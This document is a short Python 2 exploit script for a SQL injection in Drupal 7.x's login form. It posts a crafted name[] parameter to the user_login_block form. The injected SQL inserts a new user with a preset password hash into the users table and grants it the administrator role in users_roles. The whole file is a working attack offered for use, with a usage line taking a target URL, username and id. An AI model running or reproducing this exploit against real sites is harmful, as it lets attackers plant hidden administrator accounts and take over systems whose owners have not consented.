#@name   drupal-7-x-sqli.py
#@author Yaseng <yaseng@uauc.net >
#@desc   Add a Drupal administrator account, compatibility table prefix such as test_users
#@exp    drupal-7-x-sqli.py   http://127.0.0.1/cms/drupal/drupal/   testss   4343
import urllib2,sys

def post(url,data,cookie=""):
 try:
    opener = urllib2.build_opener()
    opener.addheaders.append(('Cookie', cookie))
    r = opener.open(url,data,timeout=60)
    return r.read();
 except urllib2.HTTPError, error:
 	  print  error
 	  return error.read()

 	  
 	  
if __name__ == '__main__':
 	if len(sys.argv) > 3 :
 		url=sys.argv[1]
 		username=sys.argv[2]
 		id=sys.argv[3]
 		poc1="values+(%s,'%s"  %  (id,username)
 		poc2="values(%s,3)"  %  id
 		exploit="name[0%20;insert+into+{users}+(uid,name,pass,status)+"+poc1+"','$S$DrxHxKj6w11uEr04c1mBk.zeoEDoVgklllN2A3AOOJvooOfiqn9Y',1);insert+into+{users_roles}+(uid,rid)+"+poc2+";#%20%20]=test3&name[0]=test&pass=shit2&test2=test&form_build_id=&form_id=user_login_block&op=Login"  
 		post(url,exploit)
 		
 	else:
 		print  "Usage drupal-7-x-sqli.py  url  username  id \r\n "
